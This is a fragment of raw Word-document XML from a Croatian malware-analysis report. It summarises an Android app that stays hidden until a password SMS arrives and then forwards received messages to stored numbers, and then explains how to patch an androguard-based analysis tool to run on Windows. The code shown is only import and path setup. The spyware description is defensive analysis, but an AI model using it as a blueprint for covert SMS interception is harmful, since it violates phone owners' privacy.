        <w:t>Zaključak analize</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w:rsidR="00255C85" w:rsidRDefault="00B832B6" w:rsidP="001E78E1">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Iz analize ovog programa ustanovilo se da je program namijenjen špijunaži SMS poruka na telefonu. Program je inicijalno sakriven, a otkriva se slanjem određene SMS poruke kad postane vidljiv i proces. SMS poruke obrađuju zahvaljujući Broadcast receiveru, a proces obrade se sastoji od provjere je li poruka ustvari lozinka za prikaz programa čime program postane vidljiv te, </w:t>
      </w:r>
      <w:r w:rsidR="001E78E1">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ko poruka nije lozinka, provjere je li program aktiviran čime se s baze podataka dohvaćaju brojevi mobitela te se na te brojeve šalje primljena SMS poruka. Sama aktivnost prikaza programa ne sadrži zloćudni kod, već mijenja podatke u bazi podataka.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B832B6" w:rsidRDefault="00B832B6" w:rsidP="00B832B6">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A7A96" w:rsidRDefault="004A7A96" w:rsidP="000C0B6F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070513C" w:rsidRDefault="0070513C" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc406756510"/>
      <w:bookmarkStart w:id="78" w:name="_Toc406756623"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Kompatibilnost programa za rad na Windowsima</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="0070513C" w:rsidRDefault="0070513C" w:rsidP="0070513C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Program inicijalno ne podržava u potpunosti rad na Windowsima. Program se pokrene no jedino što se prikazuje su Stringovi, razredi, metode te Dalvik kod dok sve ostalo ne radi ili se ispisuju krivi podatci. Program je moguće osposobiti no moraju se napraviti određene modifikacije u izvornom python kodu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070513C" w:rsidRDefault="001A492C" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc406756511"/>
      <w:bookmarkStart w:id="80" w:name="_Toc406756624"/>
      <w:r>
        <w:t>Opis nefunkcionalnosti programa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w:rsidR="0070513C" w:rsidRDefault="0070513C" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc406756512"/>
      <w:bookmarkStart w:id="82" w:name="_Toc406756625"/>
      <w:r>
        <w:t>Prikaz podataka u kartici CFG</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w:rsidR="0070513C" w:rsidRPr="001A492C" w:rsidRDefault="0070513C" w:rsidP="001A492C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Program prikazuje Control Flow Graph parsiranjem teksta koji opisuje graf, no parsiranje se </w:t>
      </w:r>
      <w:r w:rsidR="001A492C">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">ne </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>obavlja ispravno.</w:t>
      </w:r>
      <w:r w:rsidR="001A492C">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> Indeksi polja nisu dobro postavljeni, no metodom ispisa i ispravljanja došlo se do ispravnog zapisa. Parsiranje se obavlja u datoteci </w:t>
      </w:r>
      <w:r w:rsidR="001A492C">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>xdotParser.py</w:t>
      </w:r>
      <w:r w:rsidR="001A492C">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070513C" w:rsidRDefault="001A492C" w:rsidP="0070513C">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E901E2" w:rsidRDefault="001A492C" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc406756513"/>
      <w:bookmarkStart w:id="84" w:name="_Toc406756626"/>
      <w:r>
        <w:t xml:space="preserve">Prikaz podataka u </w:t>
      </w:r>
      <w:r w:rsidR="00E34547">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E901E2">
        <w:t>kartic</w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00E901E2">
        <w:t xml:space="preserve"> AndroidManifest.x</w:t>
      </w:r>
      <w:r>
        <w:t>ml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w:rsidR="001A492C" w:rsidRPr="001963C0" w:rsidRDefault="001A492C" w:rsidP="001963C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>AndroidManifest.xml datoteka se inicijalno prikaže u programu, no ispis je neispravan, odnosno, prikaže se datoteka koja se nalazi u primjeru pri dohvaćanju programa. Do neispravnog rada dolazi zbog</w:t>
      </w:r>
      <w:r w:rsidR="001963C0">
        <w:t xml:space="preserve"> krivog poziva alata </w:t>
      </w:r>
      <w:r w:rsidR="001963C0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>apktool</w:t>
      </w:r>
      <w:r w:rsidR="001963C0">
        <w:t xml:space="preserve">. Program je prvenstveno napravljen za Linux, a time i pozivi shella pa se do rješenja dolazi modifikacijom poziva naredbe u datoteci </w:t>
      </w:r>
      <w:r w:rsidR="001963C0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>APKtool.py</w:t>
      </w:r>
      <w:r w:rsidR="001963C0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A492C" w:rsidRDefault="001A492C" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc406756514"/>
      <w:bookmarkStart w:id="86" w:name="_Toc406756627"/>
      <w:r>
        <w:t>Prikaz podataka u kartici Smali</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="001963C0" w:rsidRPr="001963C0" w:rsidRDefault="001963C0" w:rsidP="001963C0">
      <w:pPr>
        <w:ind w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Problem prikaza podataka Smali datoteka je rezultat neispravnog prikaza datoteke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>AndroidManifest.xml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Budući da se alat </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>apktool</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pozove neispravno, time se ne stvore ni Smali datoteke pa program izbacuje ulazno-izlaznu grešku (IOError). Rješenjem prethodnog problema, riješi se i ovaj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E901E2" w:rsidRDefault="00E901E2" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc406756515"/>
      <w:bookmarkStart w:id="88" w:name="_Toc406756628"/>
      <w:r>
        <w:t xml:space="preserve">Prikaz </w:t>
      </w:r>
      <w:r w:rsidRPr="001963C0">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datoteka</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w:rsidR="00E901E2" w:rsidRDefault="001963C0" w:rsidP="001E78E1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">U prikazu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> datoteka dolazi do problema </w:t>
      </w:r>
      <w:r w:rsidR="002C1052">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>zbog neispravnog poziva alat, kao i kod prethodnih problema, te drugačijeg prikaza puteva do direktorija u Wind</w:t>
      </w:r>
      <w:r w:rsidR="001E78E1">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="002C1052">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>wsima. Do rješenja ovog problema se dolazi u nekoliko koraka:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1052" w:rsidRDefault="002C1052" w:rsidP="002C1052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Treba dohvatiti datoteku </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1052">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Jad 1.5.8g for Windows 9x/NT/2000 on Intel platform</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> koja se dohvaća sa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1052" w:rsidRDefault="002C1052" w:rsidP="002C1052">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:hyperlink r:id="rId56" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
            <w:color w:val="428BCA"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:rPr>
          <w:t>Jad 1.5.8g for Windows 9x/NT/2000 on Intel platform</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002C1052" w:rsidRDefault="002C1052" w:rsidP="002C1052">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">te </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datoteku, koja se nalazi u dohvaćenoj </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> datoteci spremiti u direktorij &lt;DIR_PROJEKTA&gt;/</w:t>
      </w:r>
      <w:r w:rsidRPr="002C1052">
        <w:t>jad158e.linux.static</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. DIR_PROJEKTA je direktorij gdje je spremljen projekt, a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1052">
        <w:t>jad158e.linux.static</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> je direktorij gdje je originalno spremljen JAD za Linux, a ime je ostavljeno isto radi jednostavnosti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1052" w:rsidRDefault="002C1052" w:rsidP="002C1052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Treba dohvatiti </w:t>
      </w:r>
      <w:r w:rsidR="002033D6">
        <w:t xml:space="preserve">datoteku </w:t>
      </w:r>
      <w:r w:rsidR="002033D6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>unzip.exe</w:t>
      </w:r>
      <w:r w:rsidR="002033D6">
        <w:t xml:space="preserve"> sa sljedeće stranice:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="002033D6">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:hyperlink r:id="rId57" w:history="1">
        <w:r w:rsidRPr="00F66B15">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>http://stahlworks.com/dev/?tool=zipunzip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="002033D6">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>te je spremiti u dire</w:t>
      </w:r>
      <w:r w:rsidR="00F3191C">
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>torij &lt;DIR_PROJEKTA&gt; gdje je &lt;DIR_PROJEKTA&gt; direktorij u kojem je spremljen projekt.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="002033D6" w:rsidRDefault="002033D6" w:rsidP="002033D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Modificirati datoteke </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>StartQT.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>JAD.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="002033D6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="002033D6"/>
    <w:p w:rsidR="00E901E2" w:rsidRDefault="00E901E2" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc406756516"/>
      <w:bookmarkStart w:id="90" w:name="_Toc406756629"/>
      <w:r>
        <w:t>Modificirani izvorni kodovi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRDefault="002033D6" w:rsidP="00BF5583">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_Toc406756517"/>
      <w:bookmarkStart w:id="92" w:name="_Toc406756630"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>xdotParser.py</w:t>
      </w:r>
      <w:bookmarkEnd w:id="91"/>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import sys</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if sys.path[0] == "":</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>sys.path.append(sys.path[1]+"/androguard/")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>PATH_INSTALL = sys.path[1]+"/androguard"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>else:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>sys.path.append(sys.path[0]+"/androguard/")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:tab/>
        <w:t>PATH_INSTALL = sys.path[0]+"/androguard"</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sys.path.append(PATH_INSTALL + "./")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core/bytecodes")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core/predicates")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core/analysis")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core/vm")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core/wm")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/core/protection")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>sys.path.append(PATH_INSTALL + "/classification")</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import androguard, analysis, androlyze</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>import bytecode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>from dvm import *</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from APKInfo import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>from GetMethods import *</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from Graph import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>from GetMethods import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D5261B">
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
        <w:t>from CallInOut import *</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class XDot:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002033D6" w:rsidRPr="00D5261B" w:rsidRDefault="002033D6" w:rsidP="00D5261B">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rStyle w:val="Jakoisticanje"/>
        </w:rPr>
      </w:pPr>
